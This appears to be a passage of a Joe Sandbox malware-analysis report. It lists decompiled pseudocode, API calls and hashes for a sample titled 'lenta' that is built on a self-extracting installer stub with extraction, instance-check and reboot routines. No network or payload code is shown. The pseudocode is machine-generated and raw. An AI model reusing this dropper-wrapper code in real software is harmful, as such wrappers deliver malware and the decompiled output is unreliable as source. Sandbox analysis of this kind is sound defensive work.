                                                                        • OpenProcessToken.ADVAPI32(00000000), ref: 00F31F02
                                                                        • ExitWindowsEx.USER32(00000002,00000000), ref: 00F31FD3
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.319721408.0000000000F31000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F30000, based on PE: true
                                                                        • Associated: 00000001.00000002.319714068.0000000000F30000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000001.00000002.319734503.0000000000F38000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000001.00000002.319741169.0000000000F3A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000001.00000002.319741169.0000000000F3C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_f30000_bPsg.jbxd
                                                                        Similarity
                                                                        • API ID: Process$CurrentExitOpenTokenWindows
                                                                        • String ID: SeShutdownPrivilege
                                                                        • API String ID: 2795981589-3733053543
                                                                        • Opcode ID: 9c6018ed84b5d4a2ef5d78d4c63eeea8cc18397eeecc55648ed091949cc3fbc8
                                                                        • Instruction ID: 591dad878ceca979c77bcd0b92b5dcb30ef5b0e779807e6a63682dbc9f4022d5
                                                                        • Opcode Fuzzy Hash: 9c6018ed84b5d4a2ef5d78d4c63eeea8cc18397eeecc55648ed091949cc3fbc8
                                                                        • Instruction Fuzzy Hash: B421CCB1F402097BDB205BB19C4AFBF76BDFB85771F100019FA02D6185D7759841B661
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E00F36CF0(struct _EXCEPTION_POINTERS* _a4) {
                                                                        
                                                                        				SetUnhandledExceptionFilter(0);
                                                                        				UnhandledExceptionFilter(_a4);
                                                                        				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
                                                                        			}



                                                                        0x00f36cf7
                                                                        0x00f36d00
                                                                        0x00f36d19

                                                                        APIs
                                                                        • SetUnhandledExceptionFilter.KERNEL32(00000000,?,00F36E26,00F31000), ref: 00F36CF7
                                                                        • UnhandledExceptionFilter.KERNEL32(00F36E26,?,00F36E26,00F31000), ref: 00F36D00
                                                                        • GetCurrentProcess.KERNEL32(C0000409,?,00F36E26,00F31000), ref: 00F36D0B
                                                                        • TerminateProcess.KERNEL32(00000000,?,00F36E26,00F31000), ref: 00F36D12
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.319721408.0000000000F31000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F30000, based on PE: true
                                                                        • Associated: 00000001.00000002.319714068.0000000000F30000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000001.00000002.319734503.0000000000F38000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000001.00000002.319741169.0000000000F3A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000001.00000002.319741169.0000000000F3C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_f30000_bPsg.jbxd
                                                                        Similarity
                                                                        • API ID: ExceptionFilterProcessUnhandled$CurrentTerminate
                                                                        • String ID:
                                                                        • API String ID: 3231755760-0
                                                                        • Opcode ID: 767eb71ffbb81deb6b9777d01eeb15bb6d96878e02cbb7846f79f2c2a5fbd9c6
                                                                        • Instruction ID: 657d1e74c4bf8f36ce50d4d3b705cd4fc4c00e9fe984705da736655bee51822e
                                                                        • Opcode Fuzzy Hash: 767eb71ffbb81deb6b9777d01eeb15bb6d96878e02cbb7846f79f2c2a5fbd9c6
                                                                        • Instruction Fuzzy Hash: ABD0C93200020CBBDB003BE2EC0CA593F2AEB48236F444004F35982021CA724451AF52
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 76%
                                                                        			E00F33210(struct HWND__* _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                        				void* __edi;
                                                                        				void* _t6;
                                                                        				void* _t10;
                                                                        				int _t20;
                                                                        				int _t21;
                                                                        				int _t23;
                                                                        				char _t24;
                                                                        				long _t25;
                                                                        				int _t27;
                                                                        				int _t30;
                                                                        				void* _t32;
                                                                        				int _t33;
                                                                        				int _t34;
                                                                        				int _t37;
                                                                        				int _t38;
                                                                        				int _t39;
                                                                        				void* _t42;
                                                                        				void* _t46;
                                                                        				CHAR* _t49;
                                                                        				void* _t58;
                                                                        				void* _t63;
                                                                        				struct HWND__* _t64;
                                                                        
                                                                        				_t64 = _a4;
                                                                        				_t6 = _a8 - 0x10;
                                                                        				if(_t6 == 0) {
                                                                        					_push(0);
                                                                        					L38:
                                                                        					EndDialog(_t64, ??);
                                                                        					L39:
                                                                        					__eflags = 1;
                                                                        					return 1;
                                                                        				}
                                                                        				_t42 = 1;
                                                                        				_t10 = _t6 - 0x100;
                                                                        				if(_t10 == 0) {
                                                                        					E00F343D0(_t64, GetDesktopWindow());
                                                                        					SetWindowTextA(_t64, "lenta");
                                                                        					SendDlgItemMessageA(_t64, 0x835, 0xc5, 0x103, 0);
                                                                        					__eflags =  *0xf39a40 - _t42; // 0x3
                                                                        					if(__eflags == 0) {
                                                                        						EnableWindow(GetDlgItem(_t64, 0x836), 0);
                                                                        					}
                                                                        					L36:
                                                                        					return _t42;
                                                                        				}
                                                                        				if(_t10 == _t42) {
                                                                        					_t20 = _a12 - 1;
                                                                        					__eflags = _t20;
                                                                        					if(_t20 == 0) {
                                                                        						_t21 = GetDlgItemTextA(_t64, 0x835, 0xf391e4, 0x104);
                                                                        						__eflags = _t21;
                                                                        						if(_t21 == 0) {
                                                                        							L32:
                                                                        							_t58 = 0x4bf;
                                                                        							_push(0);
                                                                        							_push(0x10);
                                                                        							_push(0);
                                                                        							_push(0);
                                                                        							L25:
                                                                        							E00F344B9(_t64, _t58);
                                                                        							goto L39;
                                                                        						}
                                                                        						_t49 = 0xf391e4;
                                                                        						do {
                                                                        							_t23 =  *_t49;
                                                                        							_t49 =  &(_t49[1]);
                                                                        							__eflags = _t23;
                                                                        						} while (_t23 != 0);
                                                                        						__eflags = _t49 - 0xf391e5 - 3;
                                                                        						if(_t49 - 0xf391e5 < 3) {
                                                                        							goto L32;
                                                                        						}
                                                                        						_t24 =  *0xf391e5; // 0x3a
                                                                        						__eflags = _t24 - 0x3a;
                                                                        						if(_t24 == 0x3a) {
                                                                        							L21:
                                                                        							_t25 = GetFileAttributesA(0xf391e4);
                                                                        							__eflags = _t25 - 0xffffffff;
                                                                        							if(_t25 != 0xffffffff) {
                                                                        								L26:
                                                                        								E00F3658A(0xf391e4, 0x104, 0xf31140);
                                                                        								_t27 = E00F358C8(0xf391e4);
                                                                        								__eflags = _t27;
                                                                        								if(_t27 != 0) {
                                                                        									__eflags =  *0xf391e4 - 0x5c;
                                                                        									if( *0xf391e4 != 0x5c) {
                                                                        										L30:
                                                                        										_t30 = E00F3597D(0xf391e4, 1, _t64, 1);
                                                                        										__eflags = _t30;
                                                                        										if(_t30 == 0) {
                                                                        											L35:
                                                                        											_t42 = 1;
                                                                        											__eflags = 1;
                                                                        											goto L36;
                                                                        										}
                                                                        										L31:
                                                                        										_t42 = 1;
                                                                        										EndDialog(_t64, 1);
                                                                        										goto L36;
                                                                        									}
                                                                        									__eflags =  *0xf391e5 - 0x5c;
                                                                        									if( *0xf391e5 == 0x5c) {
                                                                        										goto L31;
                                                                        									}
                                                                        									goto L30;
                                                                        								}
                                                                        								_push(0);
                                                                        								_push(0x10);
                                                                        								_push(0);
                                                                        								_push(0);
                                                                        								_t58 = 0x4be;
                                                                        								goto L25;
                                                                        							}
                                                                        							_t32 = E00F344B9(_t64, 0x54a, 0xf391e4, 0, 0x20, 4);
                                                                        							__eflags = _t32 - 6;
                                                                        							if(_t32 != 6) {
                                                                        								goto L35;
                                                                        							}
                                                                        							_t33 = CreateDirectoryA(0xf391e4, 0);
                                                                        							__eflags = _t33;
                                                                        							if(_t33 != 0) {
                                                                        								goto L26;
                                                                        							}
                                                                        							_push(0);
                                                                        							_push(0x10);
                                                                        							_push(0);
                                                                        							_push(0xf391e4);
                                                                        							_t58 = 0x4cb;
                                                                        							goto L25;
                                                                        						}
                                                                        						__eflags =  *0xf391e4 - 0x5c;
                                                                        						if( *0xf391e4 != 0x5c) {
                                                                        							goto L32;
                                                                        						}
                                                                        						__eflags = _t24 - 0x5c;
                                                                        						if(_t24 != 0x5c) {
                                                                        							goto L32;
                                                                        						}
                                                                        						goto L21;
                                                                        					}
                                                                        					_t34 = _t20 - 1;
                                                                        					__eflags = _t34;
                                                                        					if(_t34 == 0) {
                                                                        						EndDialog(_t64, 0);
                                                                        						 *0xf39124 = 0x800704c7;
                                                                        						goto L39;
                                                                        					}
                                                                        					__eflags = _t34 != 0x834;
                                                                        					if(_t34 != 0x834) {
                                                                        						goto L36;
                                                                        					}
                                                                        					_t37 = LoadStringA( *0xf39a3c, 0x3e8, 0xf38598, 0x200);
                                                                        					__eflags = _t37;
                                                                        					if(_t37 != 0) {
                                                                        						_t38 = E00F34224(_t64, _t46, _t46);
                                                                        						__eflags = _t38;
                                                                        						if(_t38 == 0) {
                                                                        							goto L36;
                                                                        						}
                                                                        						_t39 = SetDlgItemTextA(_t64, 0x835, 0xf387a0);
                                                                        						__eflags = _t39;
                                                                        						if(_t39 != 0) {
                                                                        							goto L36;
                                                                        						}
                                                                        						_t63 = 0x4c0;
                                                                        						L9:
                                                                        						E00F344B9(_t64, _t63, 0, 0, 0x10, 0);
                                                                        						_push(0);
                                                                        						goto L38;
                                                                        					}
                                                                        					_t63 = 0x4b1;
                                                                        					goto L9;
                                                                        				}
                                                                        				return 0;
                                                                        			}

























                                                                        0x00f3321b
                                                                        0x00f3321e
                                                                        0x00f33221
                                                                        0x00f3343c
                                                                        0x00f3343e
                                                                        0x00f3343f
                                                                        0x00f33445
                                                                        0x00f33447
                                                                        0x00000000
                                                                        0x00f33447
                                                                        0x00f33229
                                                                        0x00f3322a
                                                                        0x00f3322f
                                                                        0x00f333ec
                                                                        0x00f333f7
                                                                        0x00f33410
                                                                        0x00f33416
                                                                        0x00f3341d
                                                                        0x00f3342d
                                                                        0x00f3342d
                                                                        0x00f33438
                                                                        0x00000000
                                                                        0x00f33438
                                                                        0x00f33237
                                                                        0x00f33243
                                                                        0x00f33243
                                                                        0x00f33246
                                                                        0x00f332ee
                                                                        0x00f332f4
                                                                        0x00f332f6
                                                                        0x00f333d4
                                                                        0x00f333d6
                                                                        0x00f333db
                                                                        0x00f333dc
                                                                        0x00f333de
                                                                        0x00f333df
                                                                        0x00f33370
                                                                        0x00f33372
                                                                        0x00000000
                                                                        0x00f33372
                                                                        0x00f332fc
                                                                        0x00f33301
                                                                        0x00f33301
                                                                        0x00f33303
                                                                        0x00f33304
                                                                        0x00f33304
                                                                        0x00f3330a
                                                                        0x00f3330d
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00f33313
                                                                        0x00f33318
                                                                        0x00f3331a
                                                                        0x00f33331
                                                                        0x00f33332
                                                                        0x00f3333a
                                                                        0x00f3333d
                                                                        0x00f3337c
                                                                        0x00f33388
                                                                        0x00f3338f
                                                                        0x00f33394
                                                                        0x00f33396
                                                                        0x00f333a4
                                                                        0x00f333ab
                                                                        0x00f333b6
                                                                        0x00f333be
                                                                        0x00f333c3
                                                                        0x00f333c5
                                                                        0x00f33435
                                                                        0x00f33437
                                                                        0x00f33437
                                                                        0x00000000
                                                                        0x00f33437
                                                                        0x00f333c7
                                                                        0x00f333c9
                                                                        0x00f333cc
                                                                        0x00000000
                                                                        0x00f333cc
                                                                        0x00f333ad
                                                                        0x00f333b4
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00f333b4
                                                                        0x00f33398
                                                                        0x00f33399
                                                                        0x00f3339b
                                                                        0x00f3339c
                                                                        0x00f3339d
                                                                        0x00000000
                                                                        0x00f3339d
                                                                        0x00f3334c
                                                                        0x00f33351
                                                                        0x00f33354
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00f3335c
                                                                        0x00f33362
                                                                        0x00f33364
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00f33366
                                                                        0x00f33367
                                                                        0x00f33369
                                                                        0x00f3336a
                                                                        0x00f3336b
                                                                        0x00000000
                                                                        0x00f3336b
                                                                        0x00f3331c
                                                                        0x00f33323
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00f33329
                                                                        0x00f3332b
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00f3332b
                                                                        0x00f3324c
                                                                        0x00f3324c
                                                                        0x00f3324f
                                                                        0x00f332c8
                                                                        0x00f332ce
                                                                        0x00000000
                                                                        0x00f332ce
                                                                        0x00f33251
                                                                        0x00f33256
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00f33271
                                                                        0x00f33277
                                                                        0x00f33279
                                                                        0x00f33298
                                                                        0x00f3329d
                                                                        0x00f3329f
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00f332b0
                                                                        0x00f332b6
                                                                        0x00f332b8
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00f332be
                                                                        0x00f33280
                                                                        0x00f33289
                                                                        0x00f3328e
                                                                        0x00000000
                                                                        0x00f3328e
                                                                        0x00f3327b
                                                                        0x00000000
                                                                        0x00f3327b
                                                                        0x00000000

                                                                        APIs
                                                                        • LoadStringA.USER32(000003E8,00F38598,00000200), ref: 00F33271
                                                                        • GetDesktopWindow.USER32 ref: 00F333E2
                                                                        • SetWindowTextA.USER32(?,lenta), ref: 00F333F7
                                                                        • SendDlgItemMessageA.USER32(?,00000835,000000C5,00000103,00000000), ref: 00F33410
                                                                        • GetDlgItem.USER32(?,00000836), ref: 00F33426
                                                                        • EnableWindow.USER32(00000000), ref: 00F3342D
                                                                        • EndDialog.USER32(?,00000000), ref: 00F3343F
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.319721408.0000000000F31000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F30000, based on PE: true
                                                                        • Associated: 00000001.00000002.319714068.0000000000F30000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000001.00000002.319734503.0000000000F38000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000001.00000002.319741169.0000000000F3A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000001.00000002.319741169.0000000000F3C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_f30000_bPsg.jbxd
                                                                        Similarity
                                                                        • API ID: Window$Item$DesktopDialogEnableLoadMessageSendStringText
                                                                        • String ID: C:\Users\user~1\AppData\Local\Temp\IXP001.TMP\$lenta
                                                                        • API String ID: 2418873061-4193562306
                                                                        • Opcode ID: bbe48c39cac7f4f4b305f079bcc5ad354007771f8e357caa9037f2b81ba97535
                                                                        • Instruction ID: 0d211dda1c388f598023cfd6f0a5123fd4133879cbef7a70aa9e8e11f1757247
                                                                        • Opcode Fuzzy Hash: bbe48c39cac7f4f4b305f079bcc5ad354007771f8e357caa9037f2b81ba97535
                                                                        • Instruction Fuzzy Hash: 2C5149307402447BEB21EB369C8CF7B395ADB86B71F108128F685A61D0CAF8DA01B661
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 93%
                                                                        			E00F32CAA(struct HINSTANCE__* __ecx, void* __edx, void* __eflags) {
                                                                        				signed int _v8;
                                                                        				char _v268;
                                                                        				void* __ebx;
                                                                        				void* __edi;
                                                                        				void* __esi;
                                                                        				signed int _t13;
                                                                        				void* _t20;
                                                                        				void* _t23;
                                                                        				void* _t27;
                                                                        				struct HRSRC__* _t31;
                                                                        				intOrPtr _t33;
                                                                        				void* _t43;
                                                                        				void* _t48;
                                                                        				signed int _t65;
                                                                        				struct HINSTANCE__* _t66;
                                                                        				signed int _t67;
                                                                        
                                                                        				_t13 =  *0xf38004; // 0xc69e30f7
                                                                        				_v8 = _t13 ^ _t67;
                                                                        				_t65 = 0;
                                                                        				_t66 = __ecx;
                                                                        				_t48 = __edx;
                                                                        				 *0xf39a3c = __ecx;
                                                                        				memset(0xf39140, 0, 0x8fc);
                                                                        				memset(0xf38a20, 0, 0x32c);
                                                                        				memset(0xf388c0, 0, 0x104);
                                                                        				 *0xf393ec = 1;
                                                                        				_t20 = E00F3468F("TITLE", 0xf39154, 0x7f);
                                                                        				if(_t20 == 0 || _t20 > 0x80) {
                                                                        					_t64 = 0x4b1;
                                                                        					goto L32;
                                                                        				} else {
                                                                        					_t27 = CreateEventA(0, 1, 1, 0);
                                                                        					 *0xf3858c = _t27;
                                                                        					SetEvent(_t27);
                                                                        					_t64 = 0xf39a34;
                                                                        					if(E00F3468F("EXTRACTOPT", 0xf39a34, 4) != 0) {
                                                                        						if(( *0xf39a34 & 0x000000c0) == 0) {
                                                                        							L12:
                                                                        							 *0xf39120 =  *0xf39120 & _t65;
                                                                        							if(E00F35C9E(_t48, _t48, _t65, _t66) != 0) {
                                                                        								if( *0xf38a3a == 0) {
                                                                        									_t31 = FindResourceA(_t66, "VERCHECK", 0xa);
                                                                        									if(_t31 != 0) {
                                                                        										_t65 = LoadResource(_t66, _t31);
                                                                        									}
                                                                        									if( *0xf38184 != 0) {
                                                                        										__imp__#17();
                                                                        									}
                                                                        									if( *0xf38a24 == 0) {
                                                                        										_t57 = _t65;
                                                                        										if(E00F336EE(_t65) == 0) {
                                                                        											goto L33;
                                                                        										} else {
                                                                        											_t33 =  *0xf39a40; // 0x3
                                                                        											_t48 = 1;
                                                                        											if(_t33 == 1 || _t33 == 2 || _t33 == 3) {
                                                                        												if(( *0xf39a34 & 0x00000100) == 0 || ( *0xf38a38 & 0x00000001) != 0 || E00F318A3(_t64, _t66) != 0) {
                                                                        													goto L30;
                                                                        												} else {
                                                                        													_t64 = 0x7d6;
                                                                        													if(E00F36517(_t57, 0x7d6, _t34, E00F319E0, 0x547, 0x83e) != 0x83d) {
                                                                        														goto L33;
                                                                        													} else {
                                                                        														goto L30;
                                                                        													}
                                                                        												}
                                                                        											} else {
                                                                        												L30:
                                                                        												_t23 = _t48;
                                                                        											}
                                                                        										}
                                                                        									} else {
                                                                        										_t23 = 1;
                                                                        									}
                                                                        								} else {
                                                                        									E00F32390(0xf38a3a);
                                                                        									goto L33;
                                                                        								}
                                                                        							} else {
                                                                        								_t64 = 0x520;
                                                                        								L32:
                                                                        								E00F344B9(0, _t64, 0, 0, 0x10, 0);
                                                                        								goto L33;
                                                                        							}
                                                                        						} else {
                                                                        							_t64 =  &_v268;
                                                                        							if(E00F3468F("INSTANCECHECK",  &_v268, 0x104) == 0) {
                                                                        								goto L3;
                                                                        							} else {
                                                                        								_t43 = CreateMutexA(0, 1,  &_v268);
                                                                        								 *0xf38588 = _t43;
                                                                        								if(_t43 == 0 || GetLastError() != 0xb7) {
                                                                        									goto L12;
                                                                        								} else {
                                                                        									if(( *0xf39a34 & 0x00000080) == 0) {
                                                                        										_t64 = 0x524;
                                                                        										if(E00F344B9(0, 0x524, ?str?, 0, 0x20, 4) == 6) {
                                                                        											goto L12;
                                                                        										} else {
                                                                        											goto L11;
                                                                        										}
                                                                        									} else {
                                                                        										_t64 = 0x54b;
                                                                        										E00F344B9(0, 0x54b, "lenta", 0, 0x10, 0);
                                                                        										L11:
                                                                        										CloseHandle( *0xf38588);
                                                                        										 *0xf39124 = 0x800700b7;
                                                                        										goto L33;
                                                                        									}
                                                                        								}
                                                                        							}
                                                                        						}
                                                                        					} else {
                                                                        						L3:
                                                                        						_t64 = 0x4b1;
                                                                        						E00F344B9(0, 0x4b1, 0, 0, 0x10, 0);
                                                                        						 *0xf39124 = 0x80070714;
                                                                        						L33:
                                                                        						_t23 = 0;
                                                                        					}
                                                                        				}
                                                                        				return E00F36CE0(_t23, _t48, _v8 ^ _t67, _t64, _t65, _t66);
                                                                        			}



















                                                                        0x00f32cb5
                                                                        0x00f32cbc
                                                                        0x00f32cc7
                                                                        0x00f32cc9
                                                                        0x00f32cd1
                                                                        0x00f32cd3
                                                                        0x00f32cd9
                                                                        0x00f32ce9
                                                                        0x00f32cf9
                                                                        0x00f32d0e
                                                                        0x00f32d15
                                                                        0x00f32d1c
                                                                        0x00f32ef3
                                                                        0x00000000
                                                                        0x00f32d2d
                                                                        0x00f32d34
                                                                        0x00f32d3b
                                                                        0x00f32d40
                                                                        0x00f32d48
                                                                        0x00f32d59
                                                                        0x00f32d84
                                                                        0x00f32e1f
                                                                        0x00f32e1f
                                                                        0x00f32e2e
                                                                        0x00f32e41
                                                                        0x00f32e5a
                                                                        0x00f32e62
                                                                        0x00f32e6c
                                                                        0x00f32e6c
                                                                        0x00f32e75
                                                                        0x00f32e77
                                                                        0x00f32e77
                                                                        0x00f32e84
                                                                        0x00f32e8b
                                                                        0x00f32e94
                                                                        0x00000000
                                                                        0x00f32e96
                                                                        0x00f32e96
                                                                        0x00f32e9e
                                                                        0x00f32ea2
                                                                        0x00f32eba
                                                                        0x00000000
                                                                        0x00f32ece
                                                                        0x00f32ede
                                                                        0x00f32eed
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00f32eed
                                                                        0x00f32eef
                                                                        0x00f32eef
                                                                        0x00f32eef
                                                                        0x00f32eef
                                                                        0x00f32ea2
                                                                        0x00f32e86
                                                                        0x00f32e88
                                                                        0x00f32e88
                                                                        0x00f32e43
                                                                        0x00f32e48
                                                                        0x00000000
                                                                        0x00f32e48
                                                                        0x00f32e30
                                                                        0x00f32e30
                                                                        0x00f32ef8
                                                                        0x00f32f01
                                                                        0x00000000
                                                                        0x00f32f01
                                                                        0x00f32d8a
                                                                        0x00f32d8f
                                                                        0x00f32da1
                                                                        0x00000000
                                                                        0x00f32da3
                                                                        0x00f32dae
                                                                        0x00f32db4
                                                                        0x00f32dbb
                                                                        0x00000000
                                                                        0x00f32dca
                                                                        0x00f32dd3
                                                                        0x00f32df5
                                                                        0x00f32e02
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00f32dd5
                                                                        0x00f32dde
                                                                        0x00f32de3
                                                                        0x00f32e04
                                                                        0x00f32e0a
                                                                        0x00f32e10
                                                                        0x00000000
                                                                        0x00f32e10
                                                                        0x00f32dd3
                                                                        0x00f32dbb
                                                                        0x00f32da1
                                                                        0x00f32d5b
                                                                        0x00f32d5b
                                                                        0x00f32d5d
                                                                        0x00f32d69
                                                                        0x00f32d6e
                                                                        0x00f32f06
                                                                        0x00f32f06
                                                                        0x00f32f06
                                                                        0x00f32d59
                                                                        0x00f32f18

                                                                        APIs
                                                                        • memset.MSVCRT ref: 00F32CD9
                                                                        • memset.MSVCRT ref: 00F32CE9
                                                                        • memset.MSVCRT ref: 00F32CF9
                                                                          • Part of subcall function 00F3468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00F346A0
                                                                          • Part of subcall function 00F3468F: SizeofResource.KERNEL32(00000000,00000000,?,00F32D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00F346A9
                                                                          • Part of subcall function 00F3468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00F346C3
                                                                          • Part of subcall function 00F3468F: LoadResource.KERNEL32(00000000,00000000,?,00F32D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00F346CC
                                                                          • Part of subcall function 00F3468F: LockResource.KERNEL32(00000000,?,00F32D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00F346D3
                                                                          • Part of subcall function 00F3468F: memcpy_s.MSVCRT ref: 00F346E5
                                                                          • Part of subcall function 00F3468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00F346EF
                                                                        • CreateEventA.KERNEL32(00000000,00000001,00000001,00000000,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00F32D34
                                                                        • SetEvent.KERNEL32(00000000,?,?,?,?,?,?,?,00000002,00000000), ref: 00F32D40
                                                                        • CreateMutexA.KERNEL32(00000000,00000001,?,00000104,00000004,?,?,?,?,?,?,?,00000002,00000000), ref: 00F32DAE
                                                                        • GetLastError.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 00F32DBD
                                                                        • CloseHandle.KERNEL32(lenta,00000000,00000020,00000004,?,?,?,?,?,?,?,00000002,00000000), ref: 00F32E0A
                                                                          • Part of subcall function 00F344B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00F34518
                                                                          • Part of subcall function 00F344B9: MessageBoxA.USER32(?,?,lenta,00010010), ref: 00F34554
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.319721408.0000000000F31000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F30000, based on PE: true
                                                                        • Associated: 00000001.00000002.319714068.0000000000F30000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000001.00000002.319734503.0000000000F38000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000001.00000002.319741169.0000000000F3A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000001.00000002.319741169.0000000000F3C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_f30000_bPsg.jbxd
                                                                        Similarity
                                                                        • API ID: Resource$memset$CreateEventFindLoad$CloseErrorFreeHandleLastLockMessageMutexSizeofStringmemcpy_s
                                                                        • String ID: EXTRACTOPT$INSTANCECHECK$TITLE$VERCHECK$lenta
                                                                        • API String ID: 1002816675-2993962200
                                                                        • Opcode ID: 41bacac6306947671d3b83246ff83821b2ec74357e75c79fa2203793883e7e4a
                                                                        • Instruction ID: 1c5275aa5977d4a77e1e6ab730fb52d569b0c0cb6c9d270d3e66663cad1cc8b4
                                                                        • Opcode Fuzzy Hash: 41bacac6306947671d3b83246ff83821b2ec74357e75c79fa2203793883e7e4a
                                                                        • Instruction Fuzzy Hash: 5A510870704305AAEBA4AB35DC4BB7B369AEB45770F044029F981D52D1DBFCD881FA11
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 81%
                                                                        			E00F334F0(struct HWND__* _a4, intOrPtr _a8, int _a12) {
                                                                        				void* _t9;
                                                                        				void* _t12;
                                                                        				void* _t13;
                                                                        				void* _t17;
                                                                        				void* _t23;
                                                                        				void* _t25;
                                                                        				struct HWND__* _t35;
                                                                        				struct HWND__* _t38;
                                                                        				void* _t39;
                                                                        
                                                                        				_t9 = _a8 - 0x10;
                                                                        				if(_t9 == 0) {
                                                                        					__eflags = 1;
                                                                        					L19:
                                                                        					_push(0);
                                                                        					 *0xf391d8 = 1;
                                                                        					L20:
                                                                        					_push(_a4);
                                                                        					L21:
                                                                        					EndDialog();
                                                                        					L22:
                                                                        					return 1;
                                                                        				}
                                                                        				_push(1);
                                                                        				_pop(1);
                                                                        				_t12 = _t9 - 0xf2;
                                                                        				if(_t12 == 0) {
                                                                        					__eflags = _a12 - 0x1b;
                                                                        					if(_a12 != 0x1b) {
                                                                        						goto L22;
                                                                        					}
                                                                        					goto L19;
                                                                        				}
                                                                        				_t13 = _t12 - 0xe;
                                                                        				if(_t13 == 0) {
                                                                        					_t35 = _a4;
                                                                        					 *0xf38584 = _t35;
                                                                        					E00F343D0(_t35, GetDesktopWindow());
                                                                        					__eflags =  *0xf38184; // 0x1
                                                                        					if(__eflags != 0) {
                                                                        						SendMessageA(GetDlgItem(_t35, 0x83b), 0x464, 0, 0xbb9);
                                                                        						SendMessageA(GetDlgItem(_t35, 0x83b), 0x465, 0xffffffff, 0xffff0000);
                                                                        					}
                                                                        					SetWindowTextA(_t35, "lenta");
                                                                        					_t17 = CreateThread(0, 0, E00F34FE0, 0, 0, 0xf38798);
                                                                        					 *0xf3879c = _t17;
                                                                        					__eflags = _t17;
                                                                        					if(_t17 != 0) {
                                                                        						goto L22;
                                                                        					} else {
                                                                        						E00F344B9(_t35, 0x4b8, 0, 0, 0x10, 0);
                                                                        						_push(0);
                                                                        						_push(_t35);
                                                                        						goto L21;
                                                                        					}
                                                                        				}
                                                                        				_t23 = _t13 - 1;
                                                                        				if(_t23 == 0) {
                                                                        					__eflags = _a12 - 2;
                                                                        					if(_a12 != 2) {
                                                                        						goto L22;
                                                                        					}
                                                                        					ResetEvent( *0xf3858c);
                                                                        					_t38 =  *0xf38584; // 0x0
                                                                        					_t25 = E00F344B9(_t38, 0x4b2, 0xf31140, 0, 0x20, 4);
                                                                        					__eflags = _t25 - 6;
                                                                        					if(_t25 == 6) {
                                                                        						L11:
                                                                        						 *0xf391d8 = 1;
                                                                        						SetEvent( *0xf3858c);
                                                                        						_t39 =  *0xf3879c; // 0x0
                                                                        						E00F33680(_t39);
                                                                        						_push(0);
                                                                        						goto L20;
                                                                        					}
                                                                        					__eflags = _t25 - 1;
                                                                        					if(_t25 == 1) {
                                                                        						goto L11;
                                                                        					}
                                                                        					SetEvent( *0xf3858c);
                                                                        					goto L22;
                                                                        				}
                                                                        				if(_t23 == 0xe90) {
                                                                        					TerminateThread( *0xf3879c, 0);
                                                                        					EndDialog(_a4, _a12);
                                                                        					return 1;
                                                                        				}
                                                                        				return 0;
                                                                        			}












                                                                        0x00f334fb
                                                                        0x00f334fe
                                                                        0x00f33665
                                                                        0x00f33666
                                                                        0x00f33666
                                                                        0x00f33668
                                                                        0x00f3366e
                                                                        0x00f3366e
                                                                        0x00f33671
